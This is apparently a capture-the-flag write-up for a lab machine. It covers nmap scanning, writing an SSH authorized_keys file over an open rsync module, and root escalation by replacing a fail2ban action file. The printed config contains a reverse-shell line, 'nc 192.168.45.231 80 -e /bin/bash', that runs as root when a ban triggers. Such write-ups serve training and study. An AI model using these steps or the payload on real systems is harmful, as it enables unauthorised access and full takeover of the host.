$ nmap -p- --min-rate 3000 -Pn 192.168.243.126
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 21:08 +08
Nmap scan report for 192.168.243.126
Host is up (0.17s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
873/tcp open rsync
Rsync was the only thing available.
Rsync Enum -> SSH
Hacktricks has a whole page for RSync we can follow:
We can first do further enumeration on the modules available:
$ nmap -sV --script "rsync-list-modules" -p 873 192.168.243.126
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 21:09 +08
Nmap scan report for 192.168.243.126
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
| rsync-list-modules:
|_ fox fox home
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.45 seconds
fox might be the user present on the machine. We can list the files present:
$ rsync -av .ssh rsync://fox@192.168.243.126/fox
sending incremental file list
.ssh/
.ssh/authorized_keys
sent 534 bytes received 67 bytes 240.40 bytes/sec
total size is 391 speedup is 0.65
Then, we can ssh in:
Privilege Escalation
Fail2ban -> Root
The user is able to edit the fail2ban configuration files to execute commands as root since fox is part of that group.
We just need to create a malicious iptables-multiport.conf file like this:
# Fail2Ban configuration file
#
# Author: Cyril Jaquier
# Modified by Yaroslav Halchenko for multiport banning
#
[INCLUDES]
before = iptables-common.conf
[Definition]
# Option: actionstart
# Notes.: command executed once at the start of Fail2Ban.
# Values: CMD
#
actionstart = <iptables> -N f2b-<name>
<iptables> -A f2b-<name> -j <returntype>
<iptables> -I <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
# Option: actionstop
# Notes.: command executed once at the end of Fail2Ban
# Values: CMD
#
actionstop = <iptables> -D <chain> -p <protocol> -m multiport --dports <port> -j f2b-<name>
<actionflush>
<iptables> -X f2b-<name>
# Option: actioncheck
# Notes.: command executed once before each actionban command
# Values: CMD
#
actioncheck = <iptables> -n -L <chain> | grep -q 'f2b-<name>[ \t]'
# Option: actionban
# Notes.: command executed when banning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: See jail.conf(5) man page
# Values: CMD
#
actionban = nc 192.168.45.231 80 -e /bin/bash
# Option: actionunban
# Notes.: command executed when unbanning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: See jail.conf(5) man page
# Values: CMD
#
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
[Init]
Afterwards, replace the actual file with our malicious one, where the actionban has been edited.
